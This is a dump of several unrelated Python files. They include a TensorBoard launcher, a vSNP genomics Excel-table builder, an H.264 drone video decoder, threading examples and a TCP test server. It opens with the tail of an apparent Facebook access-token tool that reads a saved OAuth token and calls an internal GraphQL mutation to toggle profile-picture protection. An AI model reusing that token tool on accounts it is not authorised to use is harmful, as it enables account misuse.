print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
tensorboard.py
|
import os
import time
from io import BufferedReader
from pathlib import Path
from queue import Queue, Empty
from subprocess import Popen, PIPE
from threading import Thread
from typing import List, Optional
from labml.logger import Text
from labml import logger
from labml.internal.experiment.experiment_run import RunInfo
from labml.internal.util import rm_tree
def enqueue_output(out: BufferedReader, queue: Queue):
for line in iter(out.readline, b''):
queue.put(line.decode('utf-8'))
out.close()
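# get_output drains the queue filled by enqueue_output, which runs on a
# daemon thread so readline() on the subprocess pipe never blocks the caller.
# It waits up to 30s for the first line and 2s for each subsequent line.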
def get_output(out: BufferedReader):
q = Queue()
thread = Thread(target=enqueue_output, args=(out, q))
thread.daemon = True # thread dies with the program
thread.start()
lines = []
while True:
try:
line = q.get(timeout=30 if len(lines) == 0 else 2)
except Empty:
break
else:
lines.append(line)
return lines
class TensorBoardStarter:
pipe: Optional[Popen]
def __init__(self, symlink_path: Path,
port: int = 6006, visible_port: int = 6006,
protocol: str = 'http', host: str = 'localhost'):
self.visible_port = visible_port
self.host = host
self.protocol = protocol
self.port = port
self.symlink_path = symlink_path
self.pipe = None
@property
def url(self):
return f'{self.protocol}://{self.host}:{self.visible_port}/'
def _create_symlink_folder(self):
if self.symlink_path.exists():
rm_tree(self.symlink_path)
self.symlink_path.mkdir(parents=True)
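# start() serves several runs from one TensorBoard process by pointing
# --logdir at a folder of symlinks, one per run's tensorboard_log_path.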
def start(self, runs: List[Path]):
if self.pipe is not None:
self.pipe.kill()
self._create_symlink_folder()
for p in runs:
run = RunInfo.from_path(p)
os.symlink(run.tensorboard_log_path, self.symlink_path / run.uuid)
self.pipe = Popen(['tensorboard',
f'--logdir={self.symlink_path}',
'--port', f'{self.port}',
'--bind_all'],
env=os.environ.copy(),
stderr=PIPE)
output = ''.join(get_output(self.pipe.stderr))
if output.find('Press CTRL+C to quit') != -1:
logger.log([('Tensorboard: ', Text.meta), (output, Text.subtle)])
return True, output
else:
logger.log([('Failed to start Tensorboard: ', Text.warning), (output, Text.subtle)])
return False, output
def __del__(self):
if self.pipe is not None:
self.pipe.kill()
def _test():
from labml.internal.computer.configs import computer_singleton
from labml import lab
from labml.internal.lab import lab_singleton
lab_singleton().set_path(str(Path(os.path.abspath(__file__)).parent.parent.parent.parent))
tb = TensorBoardStarter(computer_singleton().tensorboard_symlink_dir)
# for k, v in os.environ.items():
# print(k, v)
res = tb.start([
lab.get_path() / 'logs' / 'sample' / '68233e98cb5311eb9aa38d17b08f3a1d',
])
print(res)
time.sleep(100)
if __name__ == '__main__':
_test()
|
vsnp_build_tables.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import pandas
import pandas.io.formats.excel
from Bio import SeqIO
INPUT_JSON_AVG_MQ_DIR = 'input_json_avg_mq_dir'
INPUT_JSON_DIR = 'input_json_dir'
INPUT_NEWICK_DIR = 'input_newick_dir'
# Maximum columns allowed in a LibreOffice
# spreadsheet is 1024. Excel allows for
# 16,384 columns, but we'll set the lower
# number as the maximum. Some browsers
# (e.g., Firefox on Linux) are configured
# to use LibreOffice for Excel spreadsheets.
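# For example, a 2,500-column table is written as three
# workbooks of 1,024, 1,024 and 452 columns (see output_table).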
MAXCOLS = 1024
OUTPUT_EXCEL_DIR = 'output_excel_dir'
def annotate_table(table_df, group, annotation_dict):
for gbk_chrome, pro in list(annotation_dict.items()):
ref_pos = list(table_df)
ref_series = pandas.Series(ref_pos)
ref_df = pandas.DataFrame(ref_series.str.split(':', expand=True).values, columns=['reference', 'position'])
all_ref = ref_df[ref_df['reference'] == gbk_chrome]
positions = all_ref.position.to_frame()
# Create an annotation file.
annotation_file = "%s_annotations.csv" % group
with open(annotation_file, "a") as fh:
for _, row in positions.iterrows():
pos = row.position
try:
aaa = pro.iloc[pro.index.get_loc(int(pos))][['chrom', 'locus', 'product', 'gene']]
try:
chrom, name, locus, tag = aaa.values[0]
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except ValueError:
# If there is only one annotation for the entire
# chromosome (e.g., flu), indexing values[0] fails.
chrom, name, locus, tag = aaa.values
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except KeyError:
print("{}:{}\tNo annotated product".format(gbk_chrome, pos), file=fh)
# Read the annotation file into a data frame.
annotations_df = pandas.read_csv(annotation_file, sep='\t', header=None, names=['index', 'annotations'], index_col='index')
# Remove the annotation_file from disk since both
# cascade and sort tables are built using the file,
# and it is opened for writing in append mode.
os.remove(annotation_file)
# Process the data.
table_df_transposed = table_df.T
table_df_transposed.index = table_df_transposed.index.rename('index')
table_df_transposed = table_df_transposed.merge(annotations_df, left_index=True, right_index=True)
table_df = table_df_transposed.T
return table_df
def excel_formatter(json_file_name, excel_file_name, group, annotation_dict):
pandas.io.formats.excel.header_style = None
table_df = pandas.read_json(json_file_name, orient='split')
if annotation_dict is not None:
table_df = annotate_table(table_df, group, annotation_dict)
else:
table_df = table_df.append(pandas.Series(name='no annotations'))
writer = pandas.ExcelWriter(excel_file_name, engine='xlsxwriter')
table_df.to_excel(writer, sheet_name='Sheet1')
writer_book = writer.book
ws = writer.sheets['Sheet1']
format_a = writer_book.add_format({'bg_color': '#58FA82'})
format_g = writer_book.add_format({'bg_color': '#F7FE2E'})
format_c = writer_book.add_format({'bg_color': '#0000FF'})
format_t = writer_book.add_format({'bg_color': '#FF0000'})
format_normal = writer_book.add_format({'bg_color': '#FDFEFE'})
formatlowqual = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_ambigous = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_n = writer_book.add_format({'bg_color': '#E2CFDD'})
rows, cols = table_df.shape
ws.set_column(0, 0, 30)
ws.set_column(1, cols, 2.1)
ws.freeze_panes(2, 1)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows + 1, cols + 1, format_annotation)
# Make sure that row/column locations don't overlap.
ws.conditional_format(rows - 2, 1, rows - 1, cols, {'type': 'cell', 'criteria': '<', 'value': 55, 'format': formatlowqual})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'cell', 'criteria': '==', 'value': 'B$2', 'format': format_normal})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'A', 'format': format_a})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'G', 'format': format_g})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'C', 'format': format_c})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'T', 'format': format_t})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'S', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'Y', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'R', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'W', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'K', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'M', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'N', 'format': format_n})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': '-', 'format': format_n})
format_rotation = writer_book.add_format({})
format_rotation.set_rotation(90)
for column_num, column_name in enumerate(list(table_df.columns)):
ws.write(0, column_num + 1, column_name, format_rotation)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows, 400, format_annotation)
writer.save()
def get_annotation_dict(gbk_file):
gbk_dict = SeqIO.to_dict(SeqIO.parse(gbk_file, "genbank"))
annotation_dict = {}
tmp_file = "features.csv"
# Create a file of chromosomes and features.
for chromosome in list(gbk_dict.keys()):
with open(tmp_file, 'w+') as fh:
for feature in gbk_dict[chromosome].features:
if "CDS" in feature.type or "rRNA" in feature.type:
try:
product = feature.qualifiers['product'][0]
except KeyError:
product = None
try:
locus = feature.qualifiers['locus_tag'][0]
except KeyError:
locus = None
try:
gene = feature.qualifiers['gene'][0]
except KeyError:
gene = None
fh.write("%s\t%d\t%d\t%s\t%s\t%s\n" % (chromosome, int(feature.location.start), int(feature.location.end), locus, product, gene))
# Read the chromosomes and features file into a data frame.
df = pandas.read_csv(tmp_file, sep='\t', names=["chrom", "start", "stop", "locus", "product", "gene"])
# Process the data.
df = df.sort_values(['start', 'gene'], ascending=[True, False])
df = df.drop_duplicates('start')
pro = df.reset_index(drop=True)
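# Index each feature by its [start, stop] interval so annotate_table
# can map a SNP position to a feature with pro.index.get_loc(int(pos)).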
pro.index = pandas.IntervalIndex.from_arrays(pro['start'], pro['stop'], closed='both')
annotation_dict[chromosome] = pro
return annotation_dict
def get_base_file_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
elif base_file_name.find("_") > 0:
# The dot extension was likely changed to
# the " character.
items = base_file_name.split("_")
return "_".join(items[0:-1])
else:
return base_file_name
def output_cascade_table(cascade_order, mqdf, group, annotation_dict):
cascade_order_mq = pandas.concat([cascade_order, mqdf], join='inner')
output_table(cascade_order_mq, "cascade", group, annotation_dict)
def output_excel(df, type_str, group, annotation_dict, count=None):
# Output the temporary json file that
# is used by the excel_formatter.
if count is None:
if group is None:
json_file_name = "%s_order_mq.json" % type_str
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table.xlsx" % type_str)
else:
json_file_name = "%s_%s_order_mq.json" % (group, type_str)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table.xlsx" % (group, type_str))
else:
if group is None:
json_file_name = "%s_order_mq_%d.json" % (type_str, count)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table_%d.xlsx" % (type_str, count))
else:
json_file_name = "%s_%s_order_mq_%d.json" % (group, type_str, count)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table_%d.xlsx" % (group, type_str, count))
df.to_json(json_file_name, orient='split')
# Output the Excel file.
excel_formatter(json_file_name, excel_file_name, group, annotation_dict)
def output_sort_table(cascade_order, mqdf, group, annotation_dict):
sort_df = cascade_order.T
sort_df['abs_value'] = sort_df.index
sort_df[['chrom', 'pos']] = sort_df['abs_value'].str.split(':', expand=True)
sort_df = sort_df.drop(['abs_value', 'chrom'], axis=1)
sort_df.pos = sort_df.pos.astype(int)
sort_df = sort_df.sort_values(by=['pos'])
sort_df = sort_df.drop(['pos'], axis=1)
sort_df = sort_df.T
sort_order_mq = pandas.concat([sort_df, mqdf], join='inner')
output_table(sort_order_mq, "sort", group, annotation_dict)
def output_table(df, type_str, group, annotation_dict):
if isinstance(group, str) and group.startswith("dataset"):
# Inputs are single files, not collections,
# so input file names are not useful for naming
# output files.
group_str = None
else:
group_str = group
count = 0
chunk_start = 0
chunk_end = 0
column_count = df.shape[1]
if column_count >= MAXCOLS:
# Here the number of columns is greater than
# the maximum allowed by Excel, so multiple
# outputs will be produced.
while column_count >= MAXCOLS:
count += 1
chunk_end += MAXCOLS
df_of_type = df.iloc[:, chunk_start:chunk_end]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
chunk_start += MAXCOLS
column_count -= MAXCOLS
count += 1
df_of_type = df.iloc[:, chunk_start:]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
else:
output_excel(df, type_str, group_str, annotation_dict)
def preprocess_tables(task_queue, annotation_dict, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
newick_file, json_file, json_avg_mq_file = tup
avg_mq_series = pandas.read_json(json_avg_mq_file, typ='series', orient='split')
# Map quality to dataframe.
mqdf = avg_mq_series.to_frame(name='MQ')
mqdf = mqdf.T
# Get the group.
group = get_base_file_name(newick_file)
snps_df = pandas.read_json(json_file, orient='split')
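# Recover the sample (leaf) order from the newick string: branch lengths,
# commas and parentheses are stripped with the regexes below, empty entries
# are dropped, and 'root' is re-inserted at the front of the list.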
with open(newick_file, 'r') as fh:
for line in fh:
line = re.sub('[:,]', '\n', line)
line = re.sub('[)(]', '', line)
line = re.sub(r'[0-9].*\.[0-9].*\n', '', line)
line = re.sub('root\n', '', line)
sample_order = line.split('\n')
sample_order = list([_f for _f in sample_order if _f])
sample_order.insert(0, 'root')
tree_order = snps_df.loc[sample_order]
# Count number of SNPs in each column.
snp_per_column = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
for element in column:
if element != column[0]:
count = count + 1
snp_per_column.append(count)
row1 = pandas.Series(snp_per_column, tree_order.columns, name="snp_per_column")
# Count number of SNPS from the
# top of each column in the table.
snp_from_top = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
# for each element in the column
# skip the first element
for element in column[1:]:
if element == column[0]:
count = count + 1
else:
break
snp_from_top.append(count)
row2 = pandas.Series(snp_from_top, tree_order.columns, name="snp_from_top")
tree_order = tree_order.append([row1])
tree_order = tree_order.append([row2])
# In pandas=0.18.1 even this does not work:
# abc = row1.to_frame()
# abc = abc.T --> tree_order.shape (5, 18), abc.shape (1, 18)
# tree_order.append(abc)
# Continue to get error: "*** ValueError: all the input arrays must have same number of dimensions"
tree_order = tree_order.T
tree_order = tree_order.sort_values(['snp_from_top', 'snp_per_column'], ascending=[True, False])
tree_order = tree_order.T
# Remove snp_per_column and snp_from_top rows.
cascade_order = tree_order[:-2]
# Output the cascade table.
output_cascade_table(cascade_order, mqdf, group, annotation_dict)
# Output the sorted table.
output_sort_table(cascade_order, mqdf, group, annotation_dict)
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
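# For example, with 8 CPUs, 20 input files and processes=16,
# set_num_cpus returns half the CPUs (4); with 2 files it returns 2.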
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_avg_mq_json', action='store', dest='input_avg_mq_json', required=False, default=None, help='Average MQ json file')
parser.add_argument('--input_newick', action='store', dest='input_newick', required=False, default=None, help='Newick file')
parser.add_argument('--input_snps_json', action='store', dest='input_snps_json', required=False, default=None, help='SNPs json file')
parser.add_argument('--gbk_file', action='store', dest='gbk_file', required=False, default=None, help='Optional gbk file')
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
if args.gbk_file is not None:
# Create the annotation_dict for annotating
# the Excel tables.
annotation_dict = get_annotation_dict(args.gbk_file)
else:
annotation_dict = None
# The assumption here is that the list of files
# in both INPUT_NEWICK_DIR and INPUT_JSON_DIR are
# named such that they are properly matched if
# the directories contain more than 1 file (i.e.,
# hopefully the newick file names and json file names
# will be something like Mbovis-01D6_* so they can be
# sorted and properly associated with each other).
if args.input_newick is not None:
newick_files = [args.input_newick]
else:
newick_files = []
for file_name in sorted(os.listdir(INPUT_NEWICK_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_NEWICK_DIR, file_name))
newick_files.append(file_path)
if args.input_snps_json is not None:
json_files = [args.input_snps_json]
else:
json_files = []
for file_name in sorted(os.listdir(INPUT_JSON_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_DIR, file_name))
json_files.append(file_path)
if args.input_avg_mq_json is not None:
json_avg_mq_files = [args.input_avg_mq_json]
else:
json_avg_mq_files = []
for file_name in sorted(os.listdir(INPUT_JSON_AVG_MQ_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_AVG_MQ_DIR, file_name))
json_avg_mq_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
queue2 = multiprocessing.JoinableQueue()
num_files = len(newick_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
for i, newick_file in enumerate(newick_files):
json_file = json_files[i]
json_avg_mq_file = json_avg_mq_files[i]
queue1.put((newick_file, json_file, json_avg_mq_file))
# Complete the preprocess_tables task.
processes = [multiprocessing.Process(target=preprocess_tables, args=(queue1, annotation_dict, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
|
h264decoder.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Adrian Taylor
# Inspired by equivalent node.js code by Felix Geisendörfer
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
H.264 video decoder for AR.Drone 2.0. Uses ffmpeg.
"""
import os
import sys
from subprocess import PIPE, Popen
from threading import Thread
import time
import libardrone
import ctypes
import numpy as np
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, outfileobject, frame_size):
frame_size_bytes = frame_size[0] * frame_size[1] * 3
while True:
buffer_str = out.read(frame_size_bytes)
im = np.frombuffer(buffer_str, count=frame_size_bytes, dtype=np.uint8)
im = im.reshape((frame_size[0], frame_size[1], 3))
outfileobject.image_ready(im)
# Logic for making ffmpeg terminate on the death of this process
def set_death_signal(signal):
libc = ctypes.CDLL('libc.so.6')
PR_SET_DEATHSIG = 1
libc.prctl(PR_SET_DEATHSIG, signal)
def set_death_signal_int():
if sys.platform != 'darwin':
SIGINT = 2
SIGTERM = 15
set_death_signal(SIGINT)
"""
Usage: pass a listener, with a method 'data_ready' which will be called whenever there's output
from ffmpeg. This will be called in an arbitrary thread. You can later call H264ToPng.get_data_if_any to retrieve
said data.
You should then call write repeatedly to write some encoded H.264 data.
"""
class H264Decoder(object):
def __init__(self, outfileobject=None, frame_size=(360, 640)):
if outfileobject is not None:
if (H264Decoder.which('ffmpeg') is None):
raise Exception("You need to install ffmpeg to be able to run ardrone")
p = Popen(["nice", "-n", "15", "ffmpeg", "-i", "-", "-f", "sdl",
"-probesize", "2048", "-flags", "low_delay", "-f",
"rawvideo", "-pix_fmt", 'rgb24', "-"],
stdin=PIPE, stdout=PIPE, stderr=open('/dev/null', 'w'),
bufsize=0, preexec_fn=set_death_signal_int)
t = Thread(target=enqueue_output, args=(p.stdout, outfileobject, frame_size))
t.daemon = True # thread dies with the program
t.start()
else:
if (H264Decoder.which('ffplay') is None):
raise Exception("You need to install ffmpeg and ffplay to be able to run ardrone in debug mode")
p = Popen(["nice", "-n", "15", "ffplay", "-probesize", "2048",
"-flags", "low_delay", "-i", "-"],
stdin=PIPE, stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'), bufsize=-1,
preexec_fn=set_death_signal_int)
self.writefd = p.stdin
def write(self, data):
self.writefd.write(data)
@staticmethod
def which(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
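# Hedged usage sketch (an addition, not part of the original module): a minimal
# listener whose image_ready() callback receives each decoded frame, fed with raw
# H.264 bytes read from stdin (Python 3). Assumes ffmpeg is installed and on PATH;
# the frame dimensions are simply this module's defaults.
if __name__ == '__main__':
    class PrintShapeListener(object):
        def image_ready(self, image):
            # image is a (height, width, 3) uint8 numpy array
            print('decoded frame with shape', image.shape)
    decoder = H264Decoder(PrintShapeListener(), frame_size=(360, 640))
    chunk = sys.stdin.buffer.read(4096)
    while chunk:
        decoder.write(chunk)  # feed encoded H.264 data into ffmpeg
        chunk = sys.stdin.buffer.read(4096)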
|
abandoned_lock.py
|
#!/usr/bin/env python3
""" Three philosophers, thinking and eating sushi """
import threading
chopstick_a = threading.Lock()
chopstick_b = threading.Lock()
chopstick_c = threading.Lock()
sushi_count = 500
def philosopher(name, first_chopstick, second_chopstick):
global sushi_count
while sushi_count > 0: # eat sushi until it's all gone
first_chopstick.acquire()
second_chopstick.acquire()
if sushi_count > 0:
sushi_count -= 1
print(name, 'took a piece! Sushi remaining:', sushi_count)
second_chopstick.release()
first_chopstick.release()
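# Hedged sketch (an addition, not part of the original example): taking both locks
# through a `with` block guarantees they are released even if an exception is raised
# while eating, which avoids leaving a chopstick "abandoned" (permanently locked).
def careful_philosopher(name, first_chopstick, second_chopstick):
    global sushi_count
    while sushi_count > 0:
        with first_chopstick, second_chopstick:  # both released automatically on exit
            if sushi_count > 0:
                sushi_count -= 1
                print(name, 'took a piece! Sushi remaining:', sushi_count)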
if __name__ == '__main__':
threading.Thread(target=philosopher, args=('Barron', chopstick_a, chopstick_b)).start()
threading.Thread(target=philosopher, args=('Olivia', chopstick_b, chopstick_c)).start()
threading.Thread(target=philosopher, args=('Steve', chopstick_a, chopstick_c)).start()
|
terminate.py
|
import time
from threading import Thread, Event
def count(stop_event):
n = 0
while not stop_event.is_set():
n += 1
print(n)
time.sleep(1)
def other_work():
time.sleep(5)
raise RuntimeError
def main():
stop_event = Event()
t = Thread(target=count, args=(stop_event,))
try:
t.start()
other_work()
except Exception as e:
print("caught expection")
finally:
stop_event.set()
t.join()
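# Hedged variant (an addition, not in the original script): waiting on the event
# instead of sleeping lets the worker notice stop_event immediately, rather than
# only after its current one-second sleep finishes.
def count_responsive(stop_event):
    n = 0
    while not stop_event.wait(1):  # returns True as soon as the event is set
        n += 1
        print(n)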
if __name__ == "__main__":
main()
|
server.py
|
"""TCP Server module."""
import time
import socket
import select
import threading
from testplan.common.utils.timing import wait
class Server(object):
"""
A server that can send and receive messages over the session protocol.
Supports multiple connections.
:param host: The host address the server is bound to.
:type host: ``str``
:param port: The port the server is bound to.
:type port: ``str`` or ``int``
:param listen: Socket listen argument.
:type listen: ``int``
"""
def __init__(self, host='localhost', port=0, listen=1):
self._input_host = host
self._input_port = port
self._listen = listen
self._ip = None
self._port = None
self._listening = False
self._server = None
self._server_thread = None
self._lock = threading.Lock()
self._connection_by_fd = {}
self._fds = {}
self.active_connections = 0
self.accepted_connections = 0
@property
def host(self):
"""Input host provided."""
return self._input_host
@property
def ip(self):
"""IP retrieved from socket."""
return self._ip
@property
def port(self):
"""Port retrieved after binding."""
return self._port
@property
def socket(self):
"""
Returns the underlying ``socket`` object
"""
return self._server
def bind(self):
"""Bind to a socket."""
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._input_port != 0:
self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server.bind((self._input_host, self._input_port))
self._ip, self._port = self._server.getsockname()
def serve(self, loop_sleep=0.005, listening_timeout=5):
"""Start serving connections."""
self._server_thread = threading.Thread(
target=self._serving, kwargs=dict(loop_sleep=loop_sleep))
self._server_thread.daemon = True
self._server_thread.start()
wait(lambda: self._listening, listening_timeout, raise_on_timeout=True)
def _serving(self, loop_sleep=0.005):
"""Listen for new inbound connections."""
self._server.listen(self._listen)
self._listening = True
inputs = [self._server]
outputs = []
while self._listening:
readable, writable, exceptional = select.select(
inputs, outputs, inputs)
for sock in readable:
if sock is self._server:
# New connection
conn, client_addr = sock.accept()
inputs.append(conn)
self._connection_by_fd[conn.fileno()] = conn
self._fds[self.active_connections] = conn.fileno()
self.active_connections += 1
for sock in exceptional:
inputs.remove(sock)
sock.close()
time.sleep(loop_sleep)
self._remove_all_connections()
try:
self._server.shutdown(socket.SHUT_RDWR)
except:
pass
self._server.close()
def accept_connection(self, timeout=10, accept_connection_sleep=0.1):
"""
Accepts a connection in the order in which they were received.
Return the index of the connection, which can be used to send
and receive messages using that connection.
If no connection is already available or becomes available in the given
timeout, then the method returns -1.
:param timeout: Timeout to wait for receiving connection.
:type timeout: ``int``
:param accept_connection_sleep: Sleep time to retry accept connection.
:type accept_connection_sleep: ``float``
:return: Index of connection
:rtype: ``int``
"""
started = time.time()
while True:
if self.accepted_connections in self._fds:
self.accepted_connections += 1
return self.accepted_connections - 1
if time.time() > started + timeout:
return -1
time.sleep(accept_connection_sleep)
def receive(self, size=1024, conn_idx=None, timeout=30,
wait_full_size=True):
"""
Receive a message of given size (number of bytes) from the given
connection.
:param size: Number of bytes to receive
:type size: ``int``
:param conn_idx: Index of connection to receive from
:type conn_idx: ``int``
:param timeout: timeout in seconds
:type timeout: ``int``
:param wait_full_size: Wait until full size is received.
:type wait_full_size: ``bool``
:return: message received
:rtype: ``bytes``
"""
conn_idx = self._validate_connection_idx(conn_idx)
# Get file descriptor and details of connection
fdesc = self._fds[conn_idx]
connection = self._connection_by_fd[fdesc]
connection.settimeout(timeout)
if wait_full_size is False:
connection.settimeout(timeout)
msg = connection.recv(size)
connection.settimeout(0)
else:
with self._lock:
msg = b''
try:
while len(msg) < size:
new_msg = connection.recv(size - len(msg))
if not new_msg:
raise Exception('Socket connection broken')
msg += new_msg
except socket.error:
if timeout == 0:
raise socket.timeout()
raise
return msg
def send(self, msg, conn_idx=None, timeout=30):
"""
Send the given message through the given connection.
:param msg: message to be sent
:type msg: ``bytes``
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:param timeout: Timeout in seconds for sending all bytes
:type timeout: ``int``
:return: Number of bytes sent
:rtype: ``int``
"""
conn_idx = self._validate_connection_idx(conn_idx)
connection = self._connection_by_fd[self._fds[conn_idx]]
connection.settimeout(timeout)
with self._lock:
connection.sendall(msg)
return len(msg)
def close(self):
"""Closes the server and listen thread."""
self._listening = False
# self._serving may be stuck in select.select
self._server_thread.join(timeout=0.1)
def _validate_connection_idx(self, conn_idx):
"""
Check if given connection index is valid.
If this is None, then the connection defaults to the one and only
existing active connection. If there are more active connections or the
initial connection is no longer valid this will fail.
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:return: Connection index to send message to
:rtype: ``int``
"""
if conn_idx is None:
if self.accepted_connections > 1:
conn_idx = self.accepted_connections - 1
else:
conn_idx = 0
if self.accepted_connections == 0:
raise Exception('No connection accepted')
if conn_idx not in self._fds:
raise Exception('Connection {} not active'.format(conn_idx))
return conn_idx
